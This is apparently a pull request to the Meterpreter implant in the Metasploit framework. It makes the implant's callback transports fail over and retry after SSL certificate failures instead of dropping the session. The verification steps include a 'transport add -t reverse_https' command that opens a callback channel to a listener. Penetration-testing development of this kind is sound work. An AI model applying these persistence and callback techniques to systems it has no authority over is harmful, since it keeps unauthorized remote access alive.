### PR TITLE
Support transport failover for SSL cert failures

### DIFF
--- a/c/meterpreter/source/server/server_setup_win.c
+++ b/c/meterpreter/source/server/server_setup_win.c
@@ -438,21 +438,23 @@ DWORD server_setup(MetsrvConfig* config)
 					remote->transport = remote->next_transport;
 					remote->next_transport = NULL;
 
-					if (remote->next_transport_wait > 0)
-					{
-						dprintf("[TRANS] Sleeping for %u seconds ...", remote->next_transport_wait);
-
-						sleep(remote->next_transport_wait);
-						
-						// the wait is a once-off thing, needs to be reset each time
-						remote->next_transport_wait = 0;
-					}
 				}
 				else
 				{
 					// move to the next one in the list
 					dprintf("[TRANS] Moving transport from 0x%p to 0x%p", remote->transport, remote->transport->next_transport);
 					remote->transport = remote->transport->next_transport;
+				}
+
+				// transport switching and failover both need to support the waiting functionality.
+				if (remote->next_transport_wait > 0)
+				{
+					dprintf("[TRANS] Sleeping for %u seconds ...", remote->next_transport_wait);
+
+					sleep(remote->next_transport_wait);
+
+					// the wait is a once-off thing, needs to be reset each time
+					remote->next_transport_wait = 0;
 				}
 			}
 


### PR DESCRIPTION
This commit will result in SSL cert failures causing failovers to other transports, even to itself, instead of shutting the session down. This will result in repeated calls back to the endpoint, every "retry wait" seconds, and will continue to do so until the session expires, or the SSL verification works.

Be warned, this can be noisy in your console if you haven't configured things properly. The result is a lot of callbacks over the life of the session.

This is the result of the discussion located here https://github.com/rapid7/metasploit-framework/issues/5661

### Verification

Test 1:
- [x] Create a stageless https payload that requires SSL validation.
- [x] Create a listener on the same configuration that uses a different SSL cert (ie. don't specify one at all).
- [x] Run the payload, and watch it fail after redirection. Constantly.

Test 2:
- [x] Create a normal tcp payload.
- [x] Create a tcp listener for the payload.
- [x] Run the payload, establish a meterpreter session.
- [x] Create an https listener without a cert.
- [x] Add a new transport to the existing meterpreter session that uses SSL verfication: `transport add -t reverse_https -l <host> -p <port> -c <path to PEM>`
- [x] Swap transports: `transport next`
- [x] Verify that the transport attempts to connect to the https endpoint, but immediately gives up and reverts to the TCP transport.